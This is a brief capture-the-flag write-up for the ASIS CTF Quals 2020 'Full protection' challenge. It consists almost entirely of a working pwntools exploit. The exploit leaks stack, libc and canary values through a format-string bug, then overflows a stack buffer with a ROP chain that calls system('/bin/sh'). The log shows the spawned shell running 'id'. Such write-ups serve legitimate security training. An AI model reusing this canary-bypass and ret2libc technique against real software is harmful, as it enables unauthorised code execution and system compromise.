[ASIS CTF Quals 2020] Full protection

Full protection

Name : ChanHee Park

Summary : fsb leak, bof

Exploit

#!/usr/bin/python
from pwn import *
​
r = process('./chall', env={'LD_PRELOAD':'libc-2.27.so'})
lib = ELF('./libc-2.27.so')
#context.log_level = 'debug'
#gdb.attach(r)
​
r.sendline('%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p')
_leak = r.recvline().split('.')
print(_leak)
_stack = int(_leak[0], 16)
_libc = int(_leak[2], 16) - 0x3ed8c0
_canary = int(_leak[13], 16)
​
log.info('stack = ' + hex(_stack))
success('libc = ' + hex(_libc))
success('canary = ' + hex(_canary))
​
# 0x00000000000221a3 : pop rdi ; pop rbp ; ret
_poprdiret = _libc + 0x000000000002155f # pop rdi ; ret
_ppr = _libc + 0x000221a3
_binsh = _libc + 0x1b40fa
_system = _libc + 0x4f4e0
​
payload = '\x00'
payload += 'A' * (0x48-1)
payload += p64(_canary)
payload += 'B'*8
payload += p64(_ppr)
payload += p64(_binsh)
payload += 'B'*8
payload += p64(_system)
r.sendline(payload)
​
r.interactive()

Result

ch4rli3kop at ubuntu in ~/Desktop/asis2020/proctection
$ python sol_proc.py
[+] Starting local process './chall': pid 9552
[*] '/home/ch4rli3kop/Desktop/asis2020/proctection/libc-2.27.so'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
['0x7ffd1a7a7a90', '0x10', '0x7fd4e2bad8c0', '0x7fd4e2dbb540', '0x70252e70252e7025', '0x252e70252e70252e', '0x2e70252e70252e70', '0x70252e70252e7025', '0x252e70252e70252e', '0x2e70252e70252e70', '0x70252e70252e7025', '0x70252e70252e', '0x7ffd1a7a7bc0', '0x1225d781d0057500', '(nil)', '0x7fd4e27e1b97', '0x1', '0x7ffd1a7a7bc8', '0x100008000', '0x55baf7d0d850', '(nil)\n']
[*] stack = 0x7ffd1a7a7a90
[+] libc = 0x7fd4e27c0000
[+] canary = 0x1225d781d0057500
[*] Switching to interactive mode
$ id
uid=1000(ch4rli3kop) gid=1000(ch4rli3kop) groups=1000(ch4rli3kop),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare),999(docker)